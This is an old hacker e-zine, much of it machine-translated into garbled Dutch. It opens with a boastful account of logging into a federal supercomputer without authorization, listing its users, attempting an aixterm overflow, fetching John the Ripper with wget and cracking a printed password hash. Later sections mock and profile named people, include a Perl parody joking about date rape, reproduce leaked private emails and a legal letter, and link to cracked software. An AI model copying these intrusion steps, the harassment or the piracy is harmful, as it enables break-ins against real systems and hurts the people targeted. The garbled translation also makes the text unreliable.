Ё ____.____ ____._.__ ___.___ ______.____ Ё
Ё | | | \ _ _ / \ _ | | ‘: Ё
Ё | _ _ | |. | | ._____: |: | Ё
Ё | | |.: | |______ | | | Ё
Ё |. |:. | | “| | |. | Ё
Ё |: | _ | | _ _ | |: | Ё
Ё :.____| :.____ ___ / \ ___ ___ / :.___|______| Ё
Ё ” ” Ё
Ё ╠ ╠ ╠ ╠ – Tales Van de Dark Side of The Net ╠ ╠ ╠ ╠ ╠ ╠ ╠ ╠ ╠ ╠ ╠ ╠ Ё
Юдддддддддддддддддддддддддддддддддддддддддддддддддддддды

TDSN Ep. 0x0 – door de anonieme hacker voorheen bekend als *****
~~~~~~~~~~~~~
Y0. Met veel plezier i aanwezig om u de eerste aflevering van TDSN.
Dit is iets wat ik zo ppl c4n s3e h0w co0l hekkers zijn.
Nah, zijn alleen leuk om te lezen

Voor de eerste aflevering i figured .. man, theres deze idioot. Hes een fucking banaan
I wilt crack zijn wachtwoord zo slecht. Ja i gebruik mijn leet skillz te krijgen
Mofo: ph5BNn5xY7nT6: 12303 ::::::

OK leet. Op mijn machine i alleen maar over 500,000 sleutels / sec op regelmatige des
Ja i figured, wtf, letz alleen gebruik maken van een supercomputer.
Ja i surfen op het web alittle en vinden een die past bij mijn behoeften.
De Oak Ridge National Laboratory “Cheetah”.
I aanwezig om u een klein fragment:

Cheetah is een 27-node IBM pSeries System geëxploiteerd door het Computer Science and
Wiskunde verdeling van Oak Ridge National Laboratory.
Cheetah heeft 27 “Regatta” nodes, elk met tweeëndertig 1,3 GHz Power4 processoren.
De Power4 opslag hiërarchie bestaat uit drie niveaus van de cache. De eerste en
Tweede niveau zijn aan boord van het Power4 chip (twee processoren op een chip.) Niveau 1
Instructie cache is 128 KB (64 KB per processor) en de gegevens cache is 64 KB
(32 KB per processor.) De level 2 cache is 1,5 MB L2-cache gedeeld tussen
Twee processoren. Het niveau 3 is 32 MB cache en off-chip. Er zijn 16 chips
Per node.

OK redelijk strak. Dat zou leuk zijn om te kraken de kleine slet het wachtwoord op
Dus eigenlijk, deze computer heeft 32 * 27 1,3 GHz Power4 processoren.
Mkayz
Goed
Waar te beginnen?

Goed .. i dunno echt. Een dag i gevonden mezelf wroeten een niet openbaar te maken. Edu in
Het ons en … tdah. <3 hostkeys
Nyanya [. Ssh]> ssh cheetah.ccs.ornl.gov
Cens0red@cheetah.ccs.ornl.gov ‘s wachtwoord:
Laatste login: Sun november 16 2003 over ssh uit cens0red.edu

************************************************** **********************
BERICHT AAN GEBRUIKERS
Dit is een federale computersysteem en is eigendom van de Verenigde
Staten regering. Het is voor geautoriseerd gebruik. Gebruikers (geautoriseerd of
Ongeautoriseerde) hebben geen expliciete of impliciete verwachting van privacy.
Of alle toepassingen van dit systeem en alle bestanden op dit systeem kan worden
Onderschept, gecontroleerd, geregistreerd, gekopieerd, gecontroleerd, geïnspecteerd, en
Prijsgegeven aan geautoriseerde site, Department of Energy, en rechtshandhaving
Personeel, evenals gemachtigde ambtenaren van andere instanties, zowel
Binnenlandse en buitenlandse. Door het gebruik van dit systeem, de gebruiker instemt met een dergelijke
Aftappen, monitoring, opname, kopiëren, controle, inspectie, en
Openbaarmaking naar het oordeel van de bevoegde site of Department of Energy
Personeel.
Ongeautoriseerd of oneigenlijk gebruik van dit systeem kan resulteren in
Administratieve disciplinaire maatregelen en de civiele en strafrechtelijke sancties. Door
Blijven voor het gebruik van dit systeem geeft u aan uw kennis van en instemming
Aan deze bepalingen en voorwaarden van gebruik. LOG UIT ONMIDDELLIJK als je niet
Instemmen met de voorwaarden van deze waarschuwing.
************************************************** **********************
Ksh-i
$ Prtconf | hoofd
System Model: IBM ,7040-681
Machine Serienummer: 0207D6A
Processor type: PowerPC_POWER4
Aantal Processors: 32
Processor Clock Speed: 1300 MHz
CPU Type: 64-bit
Kernel Type: 32-bit
LPAR Info: 1 NULL
Memory Grootte: 32768 MB
Goede Memory Grootte: 32768 MB
$ Who | head -20
Root pts / 0 10 november 20:21 (manx.ccs.ornl.gov)
Marc ptn / 1 nov 11 23:48 (12-232-222-54.client.attbi.com)
Llwang ptn / 2 nov 10 22:52 (sred2.qtp.ufl.edu)
Weima ptn / 3 11 nov 16:58 (plasma2.physics.uiowa.edu)
Patrick ptn / 4 12 november 05:49 (nemo.physics.ncsu.edu)
Vince ptn / 5 november 12 14:08 (nugigan.lbl.gov)
Vince pts / 8 12 november 20:38 (nugigan.lbl.gov)
Xtao pts / 9 11 november 10:22 (csp20.csp.uga.edu)
Zingale pts/10 11 november 17:10 (nan.ucolick.org)
Gaa pts/11 11 november 07:29 (mpm09.epm.ornl.gov)
Amgeorge pts/12 11 november 07:13 (taurus.ccs.ornl.gov)
Hof pts/13 16 november 21.15 uur (5664forrest.032.popsite.net)
Xu pts/14 nov 12 19:33 (ashdown.llnl.gov)
Lts pts/16 11 november 07:58 (ca16.cad.ornl.gov)
Fperez pts/17 16 november 23:29 (littlewood.colorado.edu)
Riet pts/18 11 november 08:21 (rdu74-177-187.nc.rr.com)
Riet pts/19 11 november 08:22 (rdu74-177-187.nc.rr.com)
Schultzd pts/21 11 november 08:28 (cfadc05.phy.ornl.gov)
Riet pts/22 11 november 09:07 (rdu74-177-187.nc.rr.com)
Leonmal pts/24 11 november 16:16 (kermit.asci.uchicago.edu)
$ Uname-a
AIX cheetah0033 1 5 00207D8A4C00
/ * Aightz! Letz Root DIS m0f0!
* /
$ Cp / usr/bin/X11/aixterm. / Test
$. / Test-display xxxx: 0-im `perl-e ‘print” x “x 500’`
1363-009 aixterm: Kan niet open font -*- roman-medium-r-normal – 8-50-100-100-c-*- ISO8859-1.
Controleer de padnaam en machtigingen.
Segmentation fault
$
/ * Na het doen sommige shit in gdb voor een paar uur i
Tot de conclusie gekomen dat AIX sucks harige pik.
Vooral op supercomputers met alle soorten van bescherming.
Geen root. * /
$ Wget ftp://ftp.uu.net/tmp/john-dev-smp.tar.gz &> / dev / null
$ Tar xfz john-dev-smp.tar.gz
$ Cd john-dev-smp/src
$ Make aix-ppc-cc &> / dev / null
$ Cd .. / run
$ Echo “mofo: ph5BNn5xY7nT6: 12303 ::::::”> foosh
$ Nohup. / John-sessie: harhar foosh &
/ * Mkayz letz g0 maken som kip sandw1chez
5 min lator
* /
$. / John-show foosh
Mofo: dar2be: 12303 ::::::

1 wachtwoord gekraakt, 0 links
$ Exit
Exit

Dat is alles voor nu …
Aan de hacking-scene: houden dingen particuliere plz kthx
D0rknet sux.

04.txt-~-~-~ shcrew submits to h0no!

Fr0m r34d1ng bx’s 1nt3rn4l shcr3w m41lsp00lz w3 n0t1c3e th1s g3m 0f
3nt3rt41nm3nt!

——=_Part_155_11933234.1097102628393
Content-Type: text/plain; name=”h0nohelln0.txt”
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment; filename=”h0nohelln0.txt”

__ __ __ ___ ___ __
/\ \ /’__`\/\ \ /\_ \ /\_ \ /’__`\
\ \ \___ /\ \/\ \ \ \___ __\//\ \ \//\ \ ___ /\ \/\ \
\ \ _ `\ \ \ \ \ \ _ `\ /’__`\\ \ \ \ \ \ /’ _ `\ \ \ \ \
\ \ \ \ \ \ \_\ \ \ \ \ \/\ __/ \_\ \_ \_\ \_/\ \/\ \ \ \_\ \
\ \_\ \_\ \____/\ \_\ \_\ \____\/\____\/\____\ \_\ \_\ \____/
\/_/\/_/\/___/ \/_/\/_/\/____/\/____/\/____/\/_/\/_/\/___/
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@
uh 0hz. d0 eye sm3ll n3wb1es. HEHhehEHhehEh00h0h0h0h0h0h0h0h)H)h0h!!!
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@

WELCUM TEW ISSYEW #1 VOLYEWM 29a OF HAX0R MAGAZINE!
F3ATURING ARTICL3S FROM LANCE SPITZNER AND AN INTER-
VIEW WITH THE INFAMOUS HAX0R LEET GROUP H0N0!!!!!!!!

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@
@@@@
# TABLE OF CONTENTS FOR OVERLY EXCITED FARM ANIMALS IN THE BARNYARD! #
# ————————————————- —————–
# 01. INTERVIEW WITH THE HAXER GREWP h0no AKA h0m0
# 02. h0m0 MEMBERS LIST!?!?!?!
# 03. HAXORLICIOUS EXERPTS FROM TERMINAL ZERO
################################################## ####################
########
########
########
%#######
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%
%%
S C R O L L A G E
%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%
S C R O L L A G E ~ ~ ~ ~ ~
%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%
vvvvvvvvvvvvv
| |
| |
| /““`\ |
| | | |
| | | |
| | | |
| \_____/ |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
WHERE ARE THE KEEBLER | |
ELVES???????????????? | |
| |
| |
| |
| |
| |
| |
| |
| |
| |
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^ ~^~^~^~^~^~^~^~^~^~^
^~^~^~^~^~^~

01: INTERVIEW WITH HAXER GREWP h0no AKA h0m0

BlAckHat: so’z, how Long have yew leet pplz been around?
h0no: we’eve been around for about… like 1 week or so

BlAckHat: do you guys have a motto?
h0no: yes, “messing and threatening random people on earth”

BlAckHat: interesting, and what are yu0r goals and recent
acheivements?
h0no: we wanna be the most eleet group on the planet. after being
influenced by such movies as Hackers, Hackers 2: Takedown,
Wargames, The Net, The Mangler, and magazines such as 2600,
Hax0rTimes & lets not ferget the music of YTCracker and Ali G.

BlAckHat: why the fux are u guys so leet???
h0no: berries, herbs, and several hours on waiting lines for cons.

BlAckHat: so what were yuor recent hax attacksz?
h0no: we’ll recently we owned this group called nixsec, theyre a
buncha lamers. but, really we didnt own them like 100%, our
zine made it seem as if it did EAUHEUAHEUAHEUHAEUHAEUHAEUEHA~!!!!

BlAckHat: so in other words, you guys are retarded?
h0no: oh we’re not retarded, we’re just way too cool for school d00d
hehehe

BlAckHat: so how many members are in h0m, i mean h0no?
h0no: ….1….2….carry the 4…. 3 :):)!

BlAckHat: do you guys know how to code?
h0no: of course, we are masters are the following languages: C, C++,
Perl, VB, VBscript, Java, Javascript, Leetscript, Bash,
VXcoding, MySQL, PHP, HTML, Python, COBOL, REBOL, Pike, .NET,
ASM, uh and er Internet Coding.

BlAckHat: you guys have NO idea how to code… do you?
h0no: er

*** 20 minutes later ***

BlAckHat: you there?
h0no: sorry we were taking over a bank!

BlAckHat: right. anyway, next question
BlAckHat: you have no idea how to code do you? it took you 15 minutes
to count your members!

h0no: FUCK YOU. ILL DOS U.
h0no: * [BlAckHat] (BlAckHat@BlAckHat.666.asm) :=20
h0no: * [BlAckHat] @h0nohellno
h0no: * [BlAckHat] irc.blackened.net
h0no: * [BlAckHat] is an IRC Operator
h0no: * [BlAckHat] End of WHOIS list.
h0no: err…

*** h0no has quit (Killed: fuq fac3)

02: h0no memb3rsh1p

hELLO PPLZ. W3LC0M3 T0 AN0THER H0NOHELLN0 PROPHILE. T0DAY WEE WILL
DOAN ELEET PROPHILE 0N NONE OTHER THAN h0no!!

PeRSoNaL BIoGROpHrEaK
?????????????????????
rEAL nAME: UNKNOWN
hANDLE : nolife
hANGS iN : #darknet
nATIONAL : rUSSIAN
sPEAKS : eNGlish & rUSSIAN
lOCATION : bROOKLYN, nEW yORK
iSP : vERIZON DSL
sKILLS : hEXING wINDOWS bINARIES

FaMiLy MaTtErS
?????????????????????
mOTHER : UNKNOWN
mOMs jOB : pROSTITUTE/wAITRESS/eXOTIC dANCER
fATHER : n3td3v
dADs jOB : pORNOGRAPHER/pART-tIME sALES
mOMs aGE : 58
dADs aGE : 67
sIBLINGS : 2 dECEASED bROTHERS
* jOEY
* rICKY

eDuCaTiOnAl sTaTiStiCz
??????????????????????
sCHOOLIN : nEVER pASSED hIGHSCHOOL

jOb ‘N cArREErZ
??????????????????????
cURRENT : mOTHERS pIMP / cASHIER (mCdONALDS)

h0m0 MEMBERS LIST!?!?!?!

> Begin ultra phucking secret msg…
> SH MSG05.1_
./ \/ /…….h0no organisation
\/\ / …….memb3rz list…..
\\/
w3 kn0W y0U kiDz 0n Z0n3-h(Pr0PZ!)
l0v3 T0 pl4Y p4Zz th3 P4rC3l w1tH
h0mo m3mb3rZ s0 w3 th0UghT w3 w0uLd
sp1Ll th3 b34Nz s0 w3 c4n r3c13v3
s0m3 DdoZ!
CEO………….. bx
SECRATARY…….. dvdman (sw4lL0Wz!)
VICEPREZ……… harq
ACCOUNTS……… divineint
PUBLISHING……. so1o
RECREATION……. nolife
ALTEREGOS…….. GOBBLES
SUPERHEROS……. r4tman
ENTERTAINMENT…. route
MORNINGWOODCLONE. n3td3v
PACKETINJECTOR… SLY
n0w y0U kn0W wh0 w3 4r3 Pl34Ze Msg uZ
t0 G3t Gr33tZ&&DDoZD!!~! If y0u d0Nt
HaV3 A g00D P4ck3T3r MsG SLY FoR h3lP
ASaP!!!
> ECHO “DORKZ”_
DORKZ
^&”@$&ё%!”ё^24####.. NO CARRIER

03: HAXORLICIOUS EXERPTS FROM TERMINAL ZERO

HOI. MY NAYMES STEEV ERWIN. AND TODAI WE’RE GONNA CHECK OUT THE RARE
AND LAYME ANIMAL KNOWN DAWN UNDAH AS THE SCRIPT KIDDIE. NOW, LETS SEE
SOME ACTION AS THUH SCRIPT KIDDIE TROIS TO ATTACK ROSEC SECURITAY:

81.185.144.33 – – [13/May/2004:18:02:20 +0300]
“GET /mailman/confirm/rosec/bb12581fc16c323714d13903b5128441b4e4eef8
HTTP/1.1″$

CRAWKIE! THATS SOME ACTION RYTE THERE! UH OH. WE BETTAH RUN BEFORE IT
GETS ANGRAY AND ATTACKS US!! RUN!!
——=_Part_155_11933234.1097102628393–

05.txt-~-~-~ perlsex [aka. how to get laid]

#!/lose/ur/virginity
#
# h0no c4n c0de.
#
# greetz to zone-h forum for the help!!!

#g0t t0 f1nd m3 a l4dy…
$lady = ‘drunk’ if(open(GIRL, ‘/usr/bin/pub’));
$lady = ‘slut’ if open(BITCH, ‘/home/street/corner’)&&use protection;

#th1z alw4yz w0rkz.
chomp my $dick = () unless $lady ne ‘slut';

if(!($dick exists in @mouth)){
#sh3’s just pl4y1ng h4rd t0 g3t.
print GIRL “my what nices eyes you have..”;
if(<> eq ‘all the better to glar into your eyes while I’.
‘stroke you off’){
$lady = ‘slut';
$pants = ‘off';
foreplay();
}
}

#w41t t1ll sh3 g3tz a l04d 0f th1z!
print GIRL ‘8==========\n=========\n=====D';

#th4tz wh4t 3y3 th0ught b1tch.
if(($face = <>) eq ‘8D’){ sex($lady, ‘in car’); }
elsif(($responce = <>) eq ‘ive seen bigger’){
$lady = ‘pornstar';
use camera;
sex($lady, ‘out_side’);
}

#FUCK Y0U B1TCH!
else{
open(D13B1TCH, “>date/rape”) || kill $lady;
print D13B1TCH $roofie;
}

sub sex{
($lady, $location) = @_;

# /##\ <– sup3r h0no ascii sk1llz
goto CAR if ($location =~ /()-()>/); #(itz a c4r y0u fuckz)
goto OUTSIDE if ($location =~ / /);
else{
print “s3x h3r3?????\n”;
$lady = ‘superfreakyslut';
}

#fuck th1z b1tch
sleep $with_her;
exit;

CAR;
#g0t t0 g3t 4t th4t pussy!
open(DOORS, ‘side/of/car’) or chop($window) if $desperate;

OUTSIDE;
($thing, $todo) = foreplay();

if($todo eq ‘to party’){ exit; }
else{

@positions = (6,9);

#g0 nutz
sort(@positions);
foreach(@positions){
#sin until your done.
$done = sin($_) until $done;
}

exit if($done);
else{
#sw1tch p0s1t10nz 4nd h1t th4t pussy.
reverse(@positions);
&sex($lady, ‘here’);
}
}

sub foreplay {
open(INTERESTINGSTUFF, “below/head/above/vigina”) or
`unzip dress*`;

#3y3 l0v3 t1tz
($shirt, $bra, $boobs) = ()[0..2];

#H3y h0n, 3y3 th1nk 3y3 n0t1c3d y0u 4r0und
if(exists($shirt)){

#S0rry 4b0ut s4l4d cr34m, 3y3 d1dn’t kn0w
#1t c4m3 0ut l1k3 th4t
#1t’ll b3 w4sh3d 1n a j1ffy
open(SHIRT, “cute-silk-number”);

#H3y b4b3, w4nn4 kn0w wh4t l00kz g00d 0n my fl00r?
unlink($bra . $one_hand);

#s41n1ty ch3ck
if (!exists($boobs)){
#0h g0d fuck m3, TH4TS why h1s 4ss h0l3’z r3d!
alarm(1);

print STDOHSHIT “ITZ A MAN!GOATSECX ALEERRTT”;

close(SHIRT) && die;
}

#th3y’r3 m1n3 n0w!
my $boobs;
study $boobs;

#th3y n33d a t41nt ch3ck?
$hands = ($boobs =~ /(.)(.)/);

#4ll th3m sm4ll th1ngz add t0 p3rf3ct10n
while ($boobs =~ s/.*(nipple|raised_area|tatoo).*/g) {
$sensations .= $1;
}

seek BOOBS, $sensations,0;
return($sensations, ‘done’);

#1f $sh1rt d03sn’t ex1st
} else{
$her = ‘drunk';
while(not exists($seman)){ $you = pack ‘CU’,’NT'; }
return($her,’to party’);
}
}
}

06.txt-~-~-~ Exploit Modelling and Generalization 2

–[ Exploit Modelling and Generalization 2

–[ Introduction

y0 dudez, easy to use exploitz have been rolling for what seems like
months now, and many of the elitez making these things dont spend
enough time and need to do more coke. Most of the time exploitz use
variations on the same command line arguments most of the time. Even
if we accept this as ‘elite’, h0no sees that the elitez are making
exploitz from scratch time and time again, and the same sort of
command line options and offsetz are used most of the time. the
impact of this has two sides, first all of the zone-h kidz are able
to pick up an exploit, compile it, and use it within seconds.
This paper tries to generalize exploitation principles and also
strives to build a formal exploitation optionz model for use in
remote root and local gid gamez exploitz.

–[ In the beginning there was…

In order to try to generalize exploit principles it would come in handy to
use a drugged-up approach, in other words, we will first do a line of coke
and then run the daily packetstorm shit. Obviously, the most easy case to be
described in our new mindset is the remote root.
When looking into these types of exploits the first stricking thing that
clubbers a lot of exploit command line optionz is the way in which offsetz
and other pointless thingz to ./ kidz are used. A lot of elitez try to
prove their intellegence by making their code use some hexacecial encoding
or whatever the fuck itz called for offsetz. This is not truly a problem,
but it gets more nasty to convert these if you haven’t ./statdx a few
boxes.
The next striking thing is that the ‘offset’ and get_sp() principle is still
used far to often. First of all one can be wondering why the get_sp()
function was introduced – Linux basicly has no reason for this, so let’s move
on.
The usefull part of an exploit is the ./ effect. I asked an elite, and he
said the environment starts out at a known fixed base, and knowing this it is
easy to make an exploit without any command line options.
This technique still suffers from fluctuations in the coke, depending on how
many linez there are (ie. closer to the elitez nose). If they make sure that
the coke is going to be the first entry in the brain, elitez can stay up for
dayz and dayz coding. Exploitz will get to the point of no command line
optionz, and the kidz can use them without wasted time.
Combining all this we could write the most simple form of a remote root exploit
command line as follows:

[h0no@localhost]# ./h0-urfuckd pivx.com
[owned] pivx.com
[root@pivx.com]#

The idea of being able to ./ without options comes in truly handy in many
different situations. Especially when needing to own many whitehats very
quickly. This is the key element to successfull exploitation.

–[ local gid gamez

A bit harder to model than it’s ancient god-father, the remote root, but
certainly more interesting. The general concept of the local gid gamez
exploit is to win at gnu chess. Since no one in h0no can do this, we
decided to leave this up to the elites on vuln-dev.

Exploitz to come.

— scr1bbl3/ronaldmcdonald@grafix.nl

07.txt-~-~-~ d4nc3 d4rkcub3, d4nc3

n0t s1nc3 th3 gr34t 0wn1ng 0f udp’s l1v3j0urn4l h4s 4 bl0g b33n
h1t lyk3 th1s. 4 l1ttl3 1ntr0 m4y b3 n33d3d..

d4rkcub3 w4s 4 c0r3 m3mb3r 0f h0no dur1ng th3 m4k1ng 0f h0no1, but s1nc3
th3n h4s b33n b0mb4rd3d w1th sh0wz t0 d0.. s0 h3 h4d t0 t4k3 s0m3 t1m3
4fk. Th1s 1s n0t t0ll3r4bl3, s0 fr0m th1s d4y f0rth d4rkcub3 1s n0 l0ng3r
4ll0w3d 0n th3 ircsn3t 0r t0 r34d futur3 1ssu3z 0f h0no (n0t3: th31r w1ll
n0t b3 4ny).

fr0m http://www.livejournal.com/users/darkcube/59902.html

-~-~-~the following accounts have been compromised, and are not to be trusted :

AIM : el8haqr
AIM : darkcub3
ravematch : darkcube
hotmail/MSN : djdarkcube@hotmail.com
midnb : nexxus
yahoo : d4rkcub3@yahoo.com
YIM : d4rkcub3
>>____________________________________________________________________
_
>___
>>The information contained in this message may be privileged and
>confidential
>> and protected from disclosure. If the reader of this message is
not
>the in
>>tended recipient, or an employee or agent responsible for delivering
>this me
>>ssage to the intended recipient, you are hereby notified that any
>disseminat
>>ion, distribution or copying of this communication is strictly
>prohibited. I
>>f you have received this communication in error, please notify us
>immediatel
>>y by replying to the message and deleting it from your computer.
>Thank you.
>> Ernst & Young LLP
>>
>
>_____________________________________________________________________
__
>Cool Connection, Cool Price, Internet Access for R59 monthly @
WebMail
>http://www.webmail.co.za/dialup/
>
>
>
>
>
>_____________________________________________________________________
___
>The information contained in this message may be privileged and
confidential
> and protected from disclosure. If the reader of this message is not
the in
>tended recipient, or an employee or agent responsible for delivering
this me
>ssage to the intended recipient, you are hereby notified that any
disseminat
>ion, distribution or copying of this communication is strictly
prohibited. I
>f you have received this communication in error, please notify us
immediatel
>y by replying to the message and deleting it from your computer.
Thank you.
> Ernst & Young LLP

From: “Mourning Woode”
Subject: Re: Unlawful Exploitation of Rick Salomon/Paris Hilton Video
Date: Thu, 19 Feb 2004 01:39:02 +0200
To: “Paul S. Berra” ,,
,
Cc: “Martin Singer” , “Paul S. Berra”

Sirs, you are very missinformed as to MY involvment in this
“video”. I share a site with “illwill”, it was his decision
solely to post and the paypal link is under his name.
Furthermore I have never recieved any gain from HIS
involvement in this issue, nor am I aware of HIS dealings
in regard to this issue. Please cease and disist any action
against ME ( morningwood@thepub.co.za ) as I catagorically
deny any involvement whatsoever in this “video” issue with
your client. Personaly I have neither “viewed” nor
“distributed” said “video” in any shape or form(at)
whatsoever. If you do not wish to cease and disist and
remove me from future involvement in your “action” I will
be forced to take every step nessesary to procecute you for
defamation of character and public slander by metioning me
in conjunction with this issue.

thank you,

morningwood@thepub.co.za

cc: legal@usatoday.com
cc: legal@nytimes.com
cc: legal@cnn.com

On Wed, 18 Feb 2004 12:56:10 -0800
“Paul S. Berra” wrote:
>
> February 18, 2004
>
> CONFIDENTIAL LEGAL COMMUNICATIONS
> PROTECTED UNDER THE UNITED STATES COPYRIGHT ACT
> NOT FOR PUBLICATION OR OTHER USE
>
>
> VIA E-MAIL
> xillwillx@yahoo.com
> morningwood@thepub.co.za
> atomix@illmob.org
>
> WWW.ILLMOB.ORG
> Attn: illwill
> morning wood
> atomix
>
> Re: Salomon v. Hilton, et al./Copyright Violations
> Our File No.: 3536-4
>
> Dear Sirs/Madams:
>
> We are litigation counsel for Rick Salomon and his
> website, www.trustfundgirls.com. As we have demanded of
> other website operators and/or registrants, including
> those persons and entities recently responsible for
> www.sdr2.com, we hereby demand that you immediately cease
> and desist from any further unauthorized exploitation of
> the video (the “Video”) involving Mr. Salomon and Paris
> Hilton on the Internet and elsewhere. Specifically, it
> has come to our attention that each of you have been and
> are currently involved in the unlawful distribution and
> commercial exploitation of the Video in a malicious
> attempt to market and exploit your websites and the
> products you purport to offer.
>
> Be advised that my clients are the exclusive owners of
> the copyrights and other rights in the Video, and the
> Video is being lawfully sold on, www.trustfundgirls.com,
> the only website which is permitted to sell, publish,
> broadcast, distribute or otherwise commercially exploit
> (collectively, “exploit”) the Video, and any portion
> thereof. Therefore, if you do not immediately cease and
> desist exploiting the Video in any and all media
> whatsoever, including but not limited to stills of the
> video, your individual exposures regarding liability and
> damages in this case will continue to increase
> exponentially, minute by minute, hour by hour. This
> urgency applies with full force and effect to each and
> every person and entity, including any other websites,
> acting with you or on your behalf. Even if you purport
> to give the Video away for free is irrelevant. As the
> exclusive rights owners, my clients will suffer even more
> harm – – which we estimate will run into the tens of
> millions of dollars – – regardless of how much you charge
> for the Video. Furthermore, you will be forced to
> disgorge any revenues and profits earned therefrom and
> will be subject to criminal prosecution. Anyone involved
> in exploiting the Video will be responsible for
> compensating my clients, in full, for the damages that
> they suffer.
>
> It is no longer disputed that my clients own all
> copyrights and other rights in the Video. The
> unauthorized copying and distribution of the Video
> clearly constitutes intentional and malicious
> infringements of copyright in violation of the United
> States Copyright Act, Title 17 of the United States Code,
> Section 101, et. seq., and exposes you and everyone
> acting in concert with you to civil liability, damages,
> injunctive relief and reimbursement of all attorneys’
> fees and costs incurred by my client(s) in connection
> with a copyright infringement action. Infringement of
> Mr. Salomon’s copyrights will also expose you to criminal
> prosecution, particularly if you continue to recklessly
> choose to distribute the Video after being placed on
> written notice that you have absolutely no rights to do
> so. Section 504(b) of Title 17 of the United States Code
> states:
>
> [T]he owner of copyright under this [Act] has the
> exclusive rights to do and to authorize any of the
> following: (1) to reproduce the copyrighted work . . .
> (2) to prepare derivative works . . . (3) to distribute
> copies . . . (4) to perform the copyrighted work publicly
> . . . and (5) to display the copyrighted work publicly.
>
> (Emphasis added). Any action inconsistent with, or in
> anyway violative of, Mr. Salomon’s copyrights in the
> Video constitute copyright infringement. See also, CMAX
> / Cleveland v. UCR, Inc., 804 F. Supp. 337 (M.D. Ga.
> 1992). The Copyright Act clearly defines such actions as
> unauthorized publications and broadcasts which constitute
> infringement, whether or not you are selling the
> copyrighted work, merely trading, or supposedly giving
> them away. Section 101 of Title 17 of the United States
> Code sets forth the legal definitions of terms within the
> Act:
>
> “Publication” is the distribution of copies … of a
> work to the public by sale or other transfer of
> ownership, or by rental, lease, or lending . . . or other
> distribution.
>
> Anyone “who violates any of the exclusive rights of the
> copyright owner . . . is an infringer of the copyright.”
> 17 U.S.C. ╖╖ 501(a).
>
> You and the other infringers will be held liable for any
> and all actual damages sustained by my clients as a
> result of your unlawful exploitation of the Video, and
> you and the other infringers will be legally required and
> ordered to disgorge and pay to my clients any and all
> gross revenues and profits which you and the other
> infringers receive now or in the future in connection
> with the copying and distribution of the Video. 17 U.S.C.
> ╖╖╖╖ 504; see also, US Payphone, Inc. v. Executives
> Unlimited of Durham, Inc., 781 F. Supp. 412 (M.D.N.C.
> 1991) (in addition to damages personally suffered,
> profits gained by the infringement were disgorged
> ensuring that the infringers did not retain any benefits
> flowing from their wrongful conduct).

> This is a confidential legal notice and may not be
> published, in whole or in part. Any republishing or
> dissemination of same, including but not limited to the
> posting of the contents hereof on the Internet, shall
> constitute a copyright infringement and will subject the
> re-publisher(s) to civil liability for such actions.
> This letter does not constitute a complete or exhaustive
> statement of all of my client’s rights, claims,
> contentions or legal theories regarding this matter.
> Nothing stated herein is intended as, nor should it be
> deemed to constitute, a waiver or relinquishment of any
> of my client’s rights or remedies, whether legal or
> equitable, all of which are hereby expressly reserved.
>
> Sincerely,
>
> / S /
>
> PAUL S. BERRA
>
> cc: Mr. Richard Salomon
> Martin D. Singer, Esq.
> 3536-2\Let\PSB-INFRINGERS 021804
>
>
>
————————————————– ——————–
> PAUL S. BERRA
> LAVELY & SINGER PROFESSIONAL CORPORATION
> ATTORNEYS AT LAW
> 2049 CENTURY PARK EAST, SUITE 24000
> LOS ANGELES, CALIFORNIA 90067-2906
> TELEPHONE: (310) 556-3501
> FACSIMILE: (310) 556-3615
> www.LavelySinger.com
> E-MAIL: pberra@lavelysinger.com
>
————————————————– ——————–
>
> THIS MESSAGE IS INTENDED ONLY FOR THE USE OF THE
> INDIVIDUAL OR ENTITY TO WHICH IT IS ADDRESSED, AND MAY
> CONTAIN INFORMATION THAT IS PRIVILEGED, CONFIDENTIAL AND
> EXEMPT FROM DISCLOSURE UNDER APPLICABLE LAW AND MAY NOT
> BE PUBLISHED OR DISSEMINATED IN WHOLE OR IN PART. IF THE
> READER OF THIS MESSAGE IS NOT THE INTENDED RECIPIENT, OR
> THE EMPLOYEE OR AGENT RESPONSIBLE FOR DELIVERING THE
> MESSAGE TO THE INTENDED RECIPIENT, YOU ARE HEREBY
> NOTIFIED THAT ANY DISCLOSURE, COPYING, DISTRIBUTION OR
> THE TAKING OF ANY ACTION IN RELIANCE ON THE CONTENTS OF
> THIS COMMUNICATION IS STRICTLY PROHIBITED.
>
> IF YOU HAVE RECEIVED THIS COMMUNICATION IN ERROR, PLEASE
> NOTIFY THE LAW OFFICES OF LAVELY & SINGER PROFESSIONAL
> CORPORATION IMMEDIATELY BY TELEPHONE (310-556-3501) OR
> E-MAIL (REPLY TO SENDER’S ADDRESS), AND THEN DESTROY ALL
> COPIES OF THIS COMMUNICATION AND ANY ATTACHED FILES.
> THANK YOU.

From:
Subject: Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: camscam
Date: Tue, 10 Jun 2003 02:54:13 +0300
To: “Mourning Woode”
Full Headers
Undecoded Letter
i have found perl2exe 5.03 fullversion.. you can get it from

http://www.shadowman.ro/p2x-5.03-Win32.zip

and the crack from http://www.shadowman.ro/crack.zip
i registered that version with that crack..the command is perl2exe
-gui

C:\perl>perl2exe
Perl2Exe V5.03b Copyright (c) 1997-2002 IndigoSTAR Software
Warning: platform = Win32, perl.exe not found in path
Warning: perl.exe not found in path
Registered to Dan:Dan:20055002, ENT version
Usage: perl2exe myscript.pl
options:
-perloptions=”options” Set Perl options (Default = none)
-small Generate smaller exe file (Pro version only)
-tiny Generate even smaller exe file (Pro version
only)
-gui Generate a no-console executable (Pro version
only)
-platform=Win32 Generate code for Win32 (default)

